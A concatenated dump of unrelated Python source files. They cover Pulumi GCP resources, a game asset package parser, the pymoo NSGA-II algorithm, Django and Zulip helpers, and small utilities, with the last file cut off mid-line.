service provider organization. For Google services that support this functionality it is 'servicenetworking.googleapis.com'. """ if network is not None: pulumi.set(__self__, "network", network) if peering is not None: pulumi.set(__self__, "peering", peering) if reserved_peering_ranges is not None: pulumi.set(__self__, "reserved_peering_ranges", reserved_peering_ranges) if service is not None: pulumi.set(__self__, "service", service) @property @pulumi.getter def network(self) -> Optional[pulumi.Input[str]]: """ Name of VPC network connected with service producers using VPC peering. """ return pulumi.get(self, "network") @network.setter def network(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "network", value) @property @pulumi.getter def peering(self) -> Optional[pulumi.Input[str]]: """ (Computed) The name of the VPC Network Peering connection that was created by the service producer. """ return pulumi.get(self, "peering") @peering.setter def peering(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "peering", value) @property @pulumi.getter(name="reservedPeeringRanges") def reserved_peering_ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]: """ Named IP address range(s) of PEERING type reserved for this service provider. Note that invoking this method with a different range when connection is already established will not reallocate already provisioned service producer subnetworks. """ return pulumi.get(self, "reserved_peering_ranges") @reserved_peering_ranges.setter def reserved_peering_ranges(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]): pulumi.set(self, "reserved_peering_ranges", value) @property @pulumi.getter def service(self) -> Optional[pulumi.Input[str]]: """ Provider peering service that is managing peering connectivity for a service provider organization. For Google services that support this functionality it is 'servicenetworking.googleapis.com'. """ return pulumi.get(self, "service") @service.setter def service(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "service", value) class Connection(pulumi.CustomResource): @overload def __init__(__self__, resource_name: str, opts: Optional[pulumi.ResourceOptions] = None, network: Optional[pulumi.Input[str]] = None, reserved_peering_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, service: Optional[pulumi.Input[str]] = None, __props__=None): """ Manages a private VPC connection with a GCP service provider. For more information see [the official documentation](https://cloud.google.com/vpc/docs/configure-private-services-access#creating-connection) and [API](https://cloud.google.com/service-infrastructure/docs/service-networking/reference/rest/v1/services.connections). ## Example Usage ```python import pulumi import pulumi_gcp as gcp peering_network = gcp.compute.Network("peeringNetwork") private_ip_alloc = gcp.compute.GlobalAddress("privateIpAlloc", purpose="VPC_PEERING", address_type="INTERNAL", prefix_length=16, network=peering_network.id) foobar = gcp.servicenetworking.Connection("foobar", network=peering_network.id, service="servicenetworking.googleapis.com", reserved_peering_ranges=[private_ip_alloc.name]) ``` ## Import ServiceNetworkingConnection can be imported using any of these accepted formats ```sh $ pulumi import gcp:servicenetworking/connection:Connection peering_connection {{peering-network}}:{{service}} ``` ```sh $ pulumi import gcp:servicenetworking/connection:Connection peering_connection /projects/{{project}}/global/networks/{{peering-network}}:{{service}} ``` :param str resource_name: The name of the resource. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] network: Name of VPC network connected with service producers using VPC peering. :param pulumi.Input[Sequence[pulumi.Input[str]]] reserved_peering_ranges: Named IP address range(s) of PEERING type reserved for this service provider. Note that invoking this method with a different range when connection is already established will not reallocate already provisioned service producer subnetworks. :param pulumi.Input[str] service: Provider peering service that is managing peering connectivity for a service provider organization. For Google services that support this functionality it is 'servicenetworking.googleapis.com'. """ ... @overload def __init__(__self__, resource_name: str, args: ConnectionArgs, opts: Optional[pulumi.ResourceOptions] = None): """ Manages a private VPC connection with a GCP service provider. For more information see [the official documentation](https://cloud.google.com/vpc/docs/configure-private-services-access#creating-connection) and [API](https://cloud.google.com/service-infrastructure/docs/service-networking/reference/rest/v1/services.connections). ## Example Usage ```python import pulumi import pulumi_gcp as gcp peering_network = gcp.compute.Network("peeringNetwork") private_ip_alloc = gcp.compute.GlobalAddress("privateIpAlloc", purpose="VPC_PEERING", address_type="INTERNAL", prefix_length=16, network=peering_network.id) foobar = gcp.servicenetworking.Connection("foobar", network=peering_network.id, service="servicenetworking.googleapis.com", reserved_peering_ranges=[private_ip_alloc.name]) ``` ## Import ServiceNetworkingConnection can be imported using any of these accepted formats ```sh $ pulumi import gcp:servicenetworking/connection:Connection peering_connection {{peering-network}}:{{service}} ``` ```sh $ pulumi import gcp:servicenetworking/connection:Connection peering_connection /projects/{{project}}/global/networks/{{peering-network}}:{{service}} ``` :param str resource_name: The name of the resource. :param ConnectionArgs args: The arguments to use to populate this resource's properties. :param pulumi.ResourceOptions opts: Options for the resource. """ ... def __init__(__self__, resource_name: str, *args, **kwargs): resource_args, opts = _utilities.get_resource_args_opts(ConnectionArgs, pulumi.ResourceOptions, *args, **kwargs) if resource_args is not None: __self__._internal_init(resource_name, opts, **resource_args.__dict__) else: __self__._internal_init(resource_name, *args, **kwargs) def _internal_init(__self__, resource_name: str, opts: Optional[pulumi.ResourceOptions] = None, network: Optional[pulumi.Input[str]] = None, reserved_peering_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, service: Optional[pulumi.Input[str]] = None, __props__=None): if opts is None: opts = pulumi.ResourceOptions() if not isinstance(opts, pulumi.ResourceOptions): raise TypeError('Expected resource options to be a ResourceOptions instance') if opts.version is None: opts.version = _utilities.get_version() if opts.id is None: if __props__ is not None: raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource') __props__ = ConnectionArgs.__new__(ConnectionArgs) if network is None and not opts.urn: raise TypeError("Missing required property 'network'") __props__.__dict__["network"] = network if reserved_peering_ranges is None and not opts.urn: raise TypeError("Missing required property 'reserved_peering_ranges'") __props__.__dict__["reserved_peering_ranges"] = reserved_peering_ranges if service is None and not opts.urn: raise TypeError("Missing required property 'service'") __props__.__dict__["service"] = service __props__.__dict__["peering"] = None super(Connection, __self__).__init__( 'gcp:servicenetworking/connection:Connection', resource_name, __props__, opts) @staticmethod def get(resource_name: str, id: pulumi.Input[str], opts: Optional[pulumi.ResourceOptions] = None, network: Optional[pulumi.Input[str]] = None, peering: Optional[pulumi.Input[str]] = None, reserved_peering_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, service: Optional[pulumi.Input[str]] = None) -> 'Connection': """ Get an existing Connection resource's state with the given name, id, and optional extra properties used to qualify the lookup. :param str resource_name: The unique name of the resulting resource. :param pulumi.Input[str] id: The unique provider ID of the resource to lookup. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] network: Name of VPC network connected with service producers using VPC peering. :param pulumi.Input[str] peering: (Computed) The name of the VPC Network Peering connection that was created by the service producer. :param pulumi.Input[Sequence[pulumi.Input[str]]] reserved_peering_ranges: Named IP address range(s) of PEERING type reserved for this service provider. Note that invoking this method with a different range when connection is already established will not reallocate already provisioned service producer subnetworks. :param pulumi.Input[str] service: Provider peering service that is managing peering connectivity for a service provider organization. For Google services that support this functionality it is 'servicenetworking.googleapis.com'. """ opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id)) __props__ = _ConnectionState.__new__(_ConnectionState) __props__.__dict__["network"] = network __props__.__dict__["peering"] = peering __props__.__dict__["reserved_peering_ranges"] = reserved_peering_ranges __props__.__dict__["service"] = service return Connection(resource_name, opts=opts, __props__=__props__) @property @pulumi.getter def network(self) -> pulumi.Output[str]: """ Name of VPC network connected with service producers using VPC peering. """ return pulumi.get(self, "network") @property @pulumi.getter def peering(self) -> pulumi.Output[str]: """ (Computed) The name of the VPC Network Peering connection that was created by the service producer. """ return pulumi.get(self, "peering") @property @pulumi.getter(name="reservedPeeringRanges") def reserved_peering_ranges(self) -> pulumi.Output[Sequence[str]]: """ Named IP address range(s) of PEERING type reserved for this service provider. Note that invoking this method with a different range when connection is already established will not reallocate already provisioned service producer subnetworks. """ return pulumi.get(self, "reserved_peering_ranges") @property @pulumi.getter def service(self) -> pulumi.Output[str]: """ Provider peering service that is managing peering connectivity for a service provider organization. For Google services that support this functionality it is 'servicenetworking.googleapis.com'. """ return pulumi.get(self, "service")
py
1a3f698745f7e19d4ec5a5790be012d33d025f51
import dataclasses import typing from typing import Optional import construct from construct import ( Struct, PrefixedArray, Int64ul, Int32ul, Hex, Construct, Computed, Array, Tell, Aligned, FocusedSeq, Rebuild, Seek, Pointer, Prefixed, GreedyBytes, ) from mercury_engine_data_structures import dread_data from mercury_engine_data_structures.construct_extensions.alignment import AlignTo from mercury_engine_data_structures.construct_extensions.misc import Skip from mercury_engine_data_structures.formats.base_resource import BaseResource, NameOrAssetId, resolve_asset_id, AssetId from mercury_engine_data_structures.game_check import Game Construct_AssetId = Hex(Int64ul) def offset_for(con: Struct, name: str): result = 0 for sc in con.subcons: sc = typing.cast(Construct, sc) if sc.name == name: return result result += sc.sizeof() raise construct.ConstructError(f"Unknown field: {name}") def header_field(field_name: str): offset = offset_for(FileEntry, field_name) def result(ctx): parents = [ctx] while "_" in parents[-1]: parents.append(parents[-1]["_"]) start_headers = None index = None for c in reversed(parents): if "_start_headers" in c: start_headers = c["_start_headers"] break for c in parents: if "_resource_index" in c: index = c["_resource_index"] break if index is None or start_headers is None: raise ValueError("Missing required context key") return start_headers + (index * FileEntry.sizeof()) + offset return result FileEntry = Struct( asset_id=Construct_AssetId, start_offset=Int32ul, end_offset=Int32ul, ) PKGHeader = Struct( header_size=Int32ul, data_section_size=Int32ul, file_entries=PrefixedArray(Int32ul, FileEntry), ) PKG = Struct( _header_size=Skip(1, Int32ul), _data_section_size_address=Tell, _data_section_size=Skip(1, Int32ul), _num_files=Rebuild(Int32ul, construct.len_(construct.this.files)), _start_headers=Tell, _skip_headers=Seek(lambda ctx: ctx._num_files * FileEntry.sizeof(), 1), _align=AlignTo(128), _files_start=Tell, _update_header_size=Pointer( 0x0, Rebuild(Int32ul, lambda ctx: ctx._files_start - Int32ul.sizeof()), ), files=Array( construct.this._num_files, Aligned(8, FocusedSeq( "item", _resource_index=Computed(lambda ctx: ctx["_index"]), actual_start_offset=Tell, start_offset=Pointer(header_field("start_offset"), Rebuild(Int32ul, lambda ctx: ctx.actual_start_offset)), end_offset=Pointer(header_field("end_offset"), Rebuild(Int32ul, lambda ctx: ctx.start_offset + len(ctx.item.data))), item_size=Computed(lambda ctx: ctx.end_offset - ctx.start_offset), item=Struct( asset_id=Pointer(header_field("asset_id"), Construct_AssetId), asset_name=Computed(lambda ctx: dread_data.name_for_asset_id(ctx.asset_id)), data=Prefixed( Rebuild( Computed(lambda ctx: ctx._.item_size), construct.len_(construct.this.data), ), GreedyBytes, ), ), )), ), _files_end=Tell, _update_data_section_size=Pointer( lambda ctx: ctx._data_section_size_address, Rebuild(Int32ul, lambda ctx: ctx._files_end - ctx._files_start), ), ) @dataclasses.dataclass(frozen=True) class PkgFile: asset_id: AssetId data: bytes @property def asset_name(self) -> Optional[str]: return dread_data.name_for_asset_id(self.asset_id) class Pkg(BaseResource): @classmethod def construct_class(cls, target_game: Game) -> Construct: return PKG @classmethod def parse_stream(cls, stream: typing.BinaryIO, target_game: Game) -> "Pkg": return cls(cls.construct_class(target_game).parse_stream(stream, target_game=target_game), target_game) def build_stream(self, stream: typing.BinaryIO) -> bytes: return self.construct_class(self.target_game).build_stream(self._raw, stream, target_game=self.target_game) @property def all_assets(self) -> typing.Iterator[PkgFile]: for file in self.raw.files: yield PkgFile(file.asset_id, file.data) def get_asset(self, asset_id: NameOrAssetId) -> Optional[bytes]: asset_id = resolve_asset_id(asset_id) for file in self.raw.files: if file.asset_id == asset_id: return file.data return None def replace_asset(self, asset_id: NameOrAssetId, new_file: bytes): asset_id = resolve_asset_id(asset_id) for file in self.raw.files: if file.asset_id == asset_id: file.data = new_file return raise ValueError(f"Unknown asset id: {asset_id}") def add_asset(self, asset_id: NameOrAssetId, new_file: bytes): asset_id = resolve_asset_id(asset_id) if self.get_asset(asset_id) is not None: raise ValueError(f"Asset id already exists: {asset_id}") self.raw.files.append(construct.Container( asset_id=asset_id, data=new_file, )) def remove_asset(self, asset_id: NameOrAssetId): asset_id = resolve_asset_id(asset_id) for file in self.raw.files: if file.asset_id == asset_id: self.raw.files.remove(file) return raise ValueError(f"Unknown asset id: {asset_id}")
py
1a3f6a7451c5a2a1637eab0a25d43c7915483ef5
# -*- coding: utf-8 -*- """ 30-07-2019 Dennis van Gils """ from timeit import timeit setup = """ import numpy as np from numpy_ringbuffer import RingBuffer from collections import deque import os,sys,inspect currentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe()))) parentdir = os.path.dirname(currentdir) sys.path.insert(0,parentdir) from dvg_ringbuffer import RingBuffer as DvG_RingBuffer np.random.seed(0) N_buffers_passed = 100 buffer_size = 500 deque_size = 20500 rb1 = RingBuffer(capacity=deque_size) rb2 = DvG_RingBuffer(capacity=deque_size) dq1 = deque(maxlen=deque_size) def try1(): for i in range(N_buffers_passed): rb1.extend(np.random.randn(buffer_size)) if rb1.is_full: c = rb1[0:100] #d = np.asarray(rb2) #print(c.__array_interface__['data'][0]) def try2(): for i in range(N_buffers_passed): rb2.extend(np.random.randn(buffer_size)) if rb2.is_full: c = rb2[0:100] #d = np.asarray(rb2) #print(c.__array_interface__['data'][0]) def try3(): for i in range(N_buffers_passed): dq1.extend(np.random.randn(buffer_size)) if len(dq1) == dq1.maxlen: c = (np.array(dq1))[0:100] #print(c.__array_interface__['data'][0]) """ N = 100 print("Numpy RingBuffer strategies") print( "unwrap default : %.3f ms" % (timeit("try1()", setup=setup, number=N) / N * 1000) ) print( "unwrap into buffer: %.3f ms" % (timeit("try2()", setup=setup, number=N) / N * 1000) ) print("Slow deque") print( "deque : %.3f ms" % (timeit("try3()", setup=setup, number=N) / N * 1000) )
py
1a3f6b3274b10d85f89029b073b7bc2b80c64b8f
import numpy as np from pymoo.algorithms.genetic_algorithm import GeneticAlgorithm from pymoo.model.individual import Individual from pymoo.model.survival import Survival from pymoo.operators.crossover.simulated_binary_crossover import SimulatedBinaryCrossover from pymoo.operators.default_operators import set_if_none from pymoo.operators.mutation.polynomial_mutation import PolynomialMutation from pymoo.operators.sampling.random_sampling import RandomSampling from pymoo.operators.selection.tournament_selection import TournamentSelection, compare from pymoo.util.display import disp_multi_objective from pymoo.util.dominator import Dominator from pymoo.util.non_dominated_sorting import NonDominatedSorting from pymoo.util.randomized_argsort import randomized_argsort class NSGA2(GeneticAlgorithm): def __init__(self, pop_size=100, **kwargs): # always store the individual to store rank and crowding kwargs['individual'] = Individual(rank=np.inf, crowding=-1) # default settings for nsga2 - not overwritten if provided as kwargs set_if_none(kwargs, 'pop_size', pop_size) set_if_none(kwargs, 'sampling', RandomSampling()) set_if_none(kwargs, 'selection', TournamentSelection(func_comp=binary_tournament)) set_if_none(kwargs, 'crossover', SimulatedBinaryCrossover(prob_cross=0.9, eta_cross=15)) set_if_none(kwargs, 'mutation', PolynomialMutation(prob_mut=None, eta_mut=20)) set_if_none(kwargs, 'survival', RankAndCrowdingSurvival()) set_if_none(kwargs, 'eliminate_duplicates', True) super().__init__(**kwargs) self.tournament_type = 'comp_by_dom_and_crowding' self.func_display_attrs = disp_multi_objective def binary_tournament(pop, P, algorithm, **kwargs): if P.shape[1] != 2: raise ValueError("Only implemented for binary tournament!") tournament_type = algorithm.tournament_type S = np.full(P.shape[0], np.nan) for i in range(P.shape[0]): a, b = P[i, 0], P[i, 1] # if at least one solution is infeasible if pop[a].CV > 0.0 or pop[b].CV > 0.0: S[i] = compare(a, pop[a].CV, b, pop[b].CV, method='smaller_is_better', return_random_if_equal=True) # both solutions are feasible else: if tournament_type == 'comp_by_dom_and_crowding': rel = Dominator.get_relation(pop[a].F, pop[b].F) if rel == 1: S[i] = a elif rel == -1: S[i] = b elif tournament_type == 'comp_by_rank_and_crowding': S[i] = compare(a, pop[a].rank, b, pop[b].rank, method='smaller_is_better') else: raise Exception("Unknown tournament type.") # if rank or domination relation didn't make a decision compare by crowding if np.isnan(S[i]): S[i] = compare(a, pop[a].get("crowding"), b, pop[b].get("crowding"), method='larger_is_better', return_random_if_equal=True) return S[:, None].astype(np.int) class RankAndCrowdingSurvival(Survival): def __init__(self) -> None: super().__init__(True) def _do(self, pop, n_survive, D=None, **kwargs): # get the objective space values and objects F = pop.get("F") # the final indices of surviving individuals survivors = [] # do the non-dominated sorting until splitting front fronts = NonDominatedSorting().do(F, n_stop_if_ranked=n_survive) for k, front in enumerate(fronts): # calculate the crowding distance of the front crowding_of_front = calc_crowding_distance(F[front, :]) # save rank and crowding in the individual class for j, i in enumerate(front): pop[i].set("rank", k) pop[i].set("crowding", crowding_of_front[j]) # current front sorted by crowding distance if splitting if len(survivors) + len(front) > n_survive: I = randomized_argsort(crowding_of_front, order='descending', method='numpy') I = I[:(n_survive - len(survivors))] # otherwise take the whole front unsorted else: I = np.arange(len(front)) # extend the survivors by all or selected individuals survivors.extend(front[I]) return pop[survivors] def calc_crowding_distance(F): infinity = 1e+14 n_points = F.shape[0] n_obj = F.shape[1] if n_points <= 2: return np.full(n_points, infinity) else: # sort each column and get index I = np.argsort(F, axis=0, kind='mergesort') # now really sort the whole array F = F[I, np.arange(n_obj)] # get the distance to the last element in sorted list and replace zeros with actual values dist = np.concatenate([F, np.full((1, n_obj), np.inf)]) \ - np.concatenate([np.full((1, n_obj), -np.inf), F]) index_dist_is_zero = np.where(dist == 0) dist_to_last = np.copy(dist) for i, j in zip(*index_dist_is_zero): dist_to_last[i, j] = dist_to_last[i - 1, j] dist_to_next = np.copy(dist) for i, j in reversed(list(zip(*index_dist_is_zero))): dist_to_next[i, j] = dist_to_next[i + 1, j] # normalize all the distances norm = np.max(F, axis=0) - np.min(F, axis=0) norm[norm == 0] = np.nan dist_to_last, dist_to_next = dist_to_last[:-1] / norm, dist_to_next[1:] / norm # if we divided by zero because all values in one columns are equal replace by none dist_to_last[np.isnan(dist_to_last)] = 0.0 dist_to_next[np.isnan(dist_to_next)] = 0.0 # sum up the distance to next and last and norm by objectives - also reorder from sorted list J = np.argsort(I, axis=0) crowding = np.sum(dist_to_last[J, np.arange(n_obj)] + dist_to_next[J, np.arange(n_obj)], axis=1) / n_obj # replace infinity with a large number crowding[np.isinf(crowding)] = infinity return crowding
py
1a3f6df061d10fe8ce93e74eb544e09463845970
#!/usr/bin/env python # -*- coding: utf-8 -*- """Discovery models.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function from __future__ import unicode_literals from ralph.discovery.models_device import ( Connection, ConnectionType, Database, DatabaseType, DeprecationKind, Device, DeviceEnvironment, DeviceModel, DeviceType, DISK_PRODUCT_BLACKLIST, DISK_VENDOR_BLACKLIST, LoadBalancerMember, LoadBalancerPool, LoadBalancerType, LoadBalancerVirtualServer, MarginKind, NetworkConnection, ReadOnlyDevice, SERIAL_BLACKLIST, ServiceCatalog, UptimeSupport, ) from ralph.discovery.models_network import ( DataCenter, DiscoveryQueue, Environment, IPAddress, IPAlias, Network, NetworkKind, NetworkTerminator, ) from ralph.discovery.models_component import ( ComponentModel, ComponentType, DiskShare, DiskShareMount, Ethernet, EthernetSpeed, FibreChannel, GenericComponent, MAC_PREFIX_BLACKLIST, Memory, OperatingSystem, Processor, Software, SplunkUsage, Storage, ) from ralph.discovery.models_history import ( DiscoveryValue, HistoryChange, ) ASSET_NOT_REQUIRED = ( DeviceType.rack, DeviceType.blade_system, DeviceType.management, DeviceType.power_distribution_unit, DeviceType.data_center, DeviceType.switch_stack, DeviceType.virtual_server, DeviceType.cloud_server, DeviceType.unknown ) __all__ = [ 'DataCenter', 'DiscoveryQueue', 'Environment', 'IPAddress', 'IPAlias', 'MAC_PREFIX_BLACKLIST', 'Network', 'NetworkKind', 'NetworkTerminator', 'ComponentModel', 'ComponentType', 'DiskShare', 'DiskShareMount', 'Ethernet', 'EthernetSpeed', 'FibreChannel', 'GenericComponent', 'Memory', 'OperatingSystem', 'Processor', 'Software', 'SplunkUsage', 'Storage', 'DISK_PRODUCT_BLACKLIST', 'DISK_VENDOR_BLACKLIST', 'Database', 'DatabaseType', 'DeprecationKind', 'Device', 'DeviceEnvironment', 'DeviceModel', 'DeviceType', 'Connection', 'ConnectionType', 'LoadBalancerMember', 'LoadBalancerPool', 'LoadBalancerType', 'LoadBalancerVirtualServer', 'MarginKind', 'NetworkConnection', 'ReadOnlyDevice', 'SERIAL_BLACKLIST', 'ServiceCatalog', 'UptimeSupport', 'HistoryChange', 'DiscoveryValue', 'ASSET_NOT_REQUIRED', ] # Load the plugins code import ralph.discovery.plugins # noqa
py
1a3f6e83d9d2e7433396e8ee411613f34bd6ef1d
import os from dotenv import find_dotenv, load_dotenv import socket from indeed import IndeedClient import re project_dir = os.path.join(os.path.dirname(__file__), os.pardir, os.pardir) def get_ip(): return socket.gethostbyname(socket.gethostname()) # Set static user parameters load_dotenv(find_dotenv()) indeed_pub_id = os.environ.get("INDEED_PUB_ID") user_agent = os.environ.get("DEF_USER_AGENT") static_params = { 'userip' : get_ip(), 'useragent' : user_agent } client = IndeedClient(indeed_pub_id) # Script that pulls job search data using Indeed's api def job_search(params): # query and location parameters are required if "q" not in params: print("Please include query parameter") return None if "l" not in params: print("Please include location parameter") return None params.update(static_params) search_response = client.search(**params) return search_response def job_details(keys): details_response = client.jobs(jobkeys = (keys)) return details_response
py
1a3f7016224c5885b9f23ef6f0a6ccb405d5c14f
# Generated by Django 3.0.7 on 2020-07-02 01:17 from django.conf import settings import django.contrib.auth.models import django.contrib.auth.validators from django.db import migrations, models import django.db.models.deletion import django.utils.timezone import uuid class Migration(migrations.Migration): initial = True dependencies = [ ('auth', '0011_update_proxy_permissions'), ] operations = [ migrations.CreateModel( name='CustomUser', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('password', models.CharField(max_length=128, verbose_name='password')), ('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')), ('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')), ('username', models.CharField(error_messages={'unique': 'A user with that username already exists.'}, help_text='Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.', max_length=150, unique=True, validators=[django.contrib.auth.validators.UnicodeUsernameValidator()], verbose_name='username')), ('first_name', models.CharField(blank=True, max_length=30, verbose_name='first name')), ('last_name', models.CharField(blank=True, max_length=150, verbose_name='last name')), ('email', models.EmailField(blank=True, max_length=254, verbose_name='email address')), ('is_staff', models.BooleanField(default=False, help_text='Designates whether the user can log into this admin site.', verbose_name='staff status')), ('is_active', models.BooleanField(default=True, help_text='Designates whether this user should be treated as active. Unselect this instead of deleting accounts.', verbose_name='active')), ('date_joined', models.DateTimeField(default=django.utils.timezone.now, verbose_name='date joined')), ('uid', models.UUIDField(default=uuid.uuid4, editable=False, unique=True)), ('channels', models.TextField(blank=True)), ('privs', models.TextField(blank=True)), ('subs', models.TextField(blank=True)), ('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')), ('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')), ], options={ 'verbose_name': 'user', 'verbose_name_plural': 'users', 'abstract': False, }, managers=[ ('objects', django.contrib.auth.models.UserManager()), ], ), migrations.CreateModel( name='Channel', fields=[ ('cid', models.UUIDField(default=uuid.uuid4, primary_key=True, serialize=False, unique=True)), ('title', models.CharField(max_length=255)), ('slug', models.SlugField(max_length=255, unique=True)), ('vods', models.TextField(blank=True)), ('streamkey', models.UUIDField(default=uuid.uuid4, unique=True)), ('creator', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ('moderators', models.ManyToManyField(related_name='moderators', to=settings.AUTH_USER_MODEL)), ], ), ]
py
1a3f705834734bbeba02d8de4ef4a9b26a8043e2
from rest_framework import permissions class IsOwnwerOrReadOnly(permissions.BasePermission): ''' Custom permission to only allow owners of an object to edit it ''' def has_object_permission(self, request, view, obj): #read permissions are allowed to any request #just allo GET,HEAD ir OPTION requests if request.method in permissions.SAFE_METHODS: return True return obj.owner == request.user
py
1a3f716a35069b903cc5b88da4aec9582ada9035
import random import requests import shutil import logging import os from typing import List, Dict, Any, Optional from django.forms.models import model_to_dict from zerver.models import Realm, RealmEmoji, Subscription, Recipient, \ Attachment, Stream, Message from zerver.lib.actions import STREAM_ASSIGNMENT_COLORS as stream_colors from zerver.lib.avatar_hash import user_avatar_path_from_ids from zerver.lib.parallel import run_parallel # stubs ZerverFieldsT = Dict[str, Any] def build_zerver_realm(realm_id: int, realm_subdomain: str, time: float, other_product: str) -> List[ZerverFieldsT]: realm = Realm(id=realm_id, date_created=time, name=realm_subdomain, string_id=realm_subdomain, description=("Organization imported from %s!" % (other_product))) auth_methods = [[flag[0], flag[1]] for flag in realm.authentication_methods] realm_dict = model_to_dict(realm, exclude='authentication_methods') realm_dict['authentication_methods'] = auth_methods return[realm_dict] def build_avatar(zulip_user_id: int, realm_id: int, email: str, avatar_url: str, timestamp: Any, avatar_list: List[ZerverFieldsT]) -> None: avatar = dict( path=avatar_url, # Save original avatar url here, which is downloaded later realm_id=realm_id, content_type=None, user_profile_id=zulip_user_id, last_modified=timestamp, user_profile_email=email, s3_path="", size="") avatar_list.append(avatar) def build_subscription(recipient_id: int, user_id: int, subscription_id: int) -> ZerverFieldsT: subscription = Subscription( color=random.choice(stream_colors), id=subscription_id) subscription_dict = model_to_dict(subscription, exclude=['user_profile', 'recipient_id']) subscription_dict['user_profile'] = user_id subscription_dict['recipient'] = recipient_id return subscription_dict def build_recipient(type_id: int, recipient_id: int, type: int) -> ZerverFieldsT: recipient = Recipient( type_id=type_id, # stream id id=recipient_id, type=type) recipient_dict = model_to_dict(recipient) return recipient_dict def build_realm(zerver_realm: List[ZerverFieldsT], realm_id: int, domain_name: str) -> ZerverFieldsT: realm = dict(zerver_client=[{"name": "populate_db", "id": 1}, {"name": "website", "id": 2}, {"name": "API", "id": 3}], zerver_customprofilefield=[], zerver_customprofilefieldvalue=[], zerver_userpresence=[], # shows last logged in data, which is not available zerver_userprofile_mirrordummy=[], zerver_realmdomain=[{"realm": realm_id, "allow_subdomains": False, "domain": domain_name, "id": realm_id}], zerver_useractivity=[], zerver_realm=zerver_realm, zerver_huddle=[], zerver_userprofile_crossrealm=[], zerver_useractivityinterval=[], zerver_reaction=[], zerver_realmemoji=[], zerver_realmfilter=[]) return realm def build_usermessages(zerver_usermessage: List[ZerverFieldsT], usermessage_id: int, zerver_subscription: List[ZerverFieldsT], recipient_id: int, mentioned_users_id: List[int], message_id: int) -> int: for subscription in zerver_subscription: if subscription['recipient'] == recipient_id: flags_mask = 1 # For read if subscription['user_profile'] in mentioned_users_id: flags_mask = 9 # For read and mentioned usermessage = dict( user_profile=subscription['user_profile'], id=usermessage_id, flags_mask=flags_mask, message=message_id) usermessage_id += 1 zerver_usermessage.append(usermessage) return usermessage_id def build_defaultstream(realm_id: int, stream_id: int, defaultstream_id: int) -> ZerverFieldsT: defaultstream = dict( stream=stream_id, realm=realm_id, id=defaultstream_id) return defaultstream def build_stream(date_created: Any, realm_id: int, name: str, description: str, stream_id: int, deactivated: bool=False, invite_only: bool=False) -> ZerverFieldsT: stream = Stream( name=name, deactivated=deactivated, description=description, date_created=date_created, invite_only=invite_only, id=stream_id) stream_dict = model_to_dict(stream, exclude=['realm']) stream_dict['realm'] = realm_id return stream_dict def build_message(subject: str, pub_date: float, message_id: int, content: str, rendered_content: Optional[str], user_id: int, recipient_id: int, has_image: bool=False, has_link: bool=False, has_attachment: bool=True) -> ZerverFieldsT: zulip_message = Message( rendered_content_version=1, # this is Zulip specific subject=subject, pub_date=pub_date, id=message_id, content=content, rendered_content=rendered_content, has_image=has_image, has_attachment=has_attachment, has_link=has_link) zulip_message_dict = model_to_dict(zulip_message, exclude=['recipient', 'sender', 'sending_client']) zulip_message_dict['sender'] = user_id zulip_message_dict['sending_client'] = 1 zulip_message_dict['recipient'] = recipient_id return zulip_message_dict def build_attachment(realm_id: int, message_id: int, attachment_id: int, user_id: int, fileinfo: ZerverFieldsT, s3_path: str, zerver_attachment: List[ZerverFieldsT]) -> None: """ This function should be passed a 'fileinfo' dictionary, which contains information about 'size', 'created' (created time) and ['name'] (filename). """ attachment = Attachment( id=attachment_id, size=fileinfo['size'], create_time=fileinfo['created'], is_realm_public=True, path_id=s3_path, file_name=fileinfo['name']) attachment_dict = model_to_dict(attachment, exclude=['owner', 'messages', 'realm']) attachment_dict['owner'] = user_id attachment_dict['messages'] = [message_id] attachment_dict['realm'] = realm_id zerver_attachment.append(attachment_dict) def process_avatars(avatar_list: List[ZerverFieldsT], avatar_dir: str, realm_id: int, threads: int, size_url_suffix: str='') -> List[ZerverFieldsT]: """ This function gets the avatar of the user and saves it in the user's avatar directory with both the extensions '.png' and '.original' Required parameters: 1. avatar_list: List of avatars to be mapped in avatars records.json file 2. avatar_dir: Folder where the downloaded avatars are saved 3. realm_id: Realm ID. """ def get_avatar(avatar_upload_list: List[str]) -> int: avatar_url = avatar_upload_list[0] image_path = avatar_upload_list[1] original_image_path = avatar_upload_list[2] response = requests.get(avatar_url + size_url_suffix, stream=True) with open(image_path, 'wb') as image_file: shutil.copyfileobj(response.raw, image_file) shutil.copy(image_path, original_image_path) return 0 logging.info('######### GETTING AVATARS #########\n') logging.info('DOWNLOADING AVATARS .......\n') avatar_original_list = [] avatar_upload_list = [] for avatar in avatar_list: avatar_hash = user_avatar_path_from_ids(avatar['user_profile_id'], realm_id) avatar_url = avatar['path'] avatar_original = dict(avatar) image_path = ('%s/%s.png' % (avatar_dir, avatar_hash)) original_image_path = ('%s/%s.original' % (avatar_dir, avatar_hash)) avatar_upload_list.append([avatar_url, image_path, original_image_path]) # We don't add the size field here in avatar's records.json, # since the metadata is not needed on the import end, and we # don't have it until we've downloaded the files anyway. avatar['path'] = image_path avatar['s3_path'] = image_path avatar_original['path'] 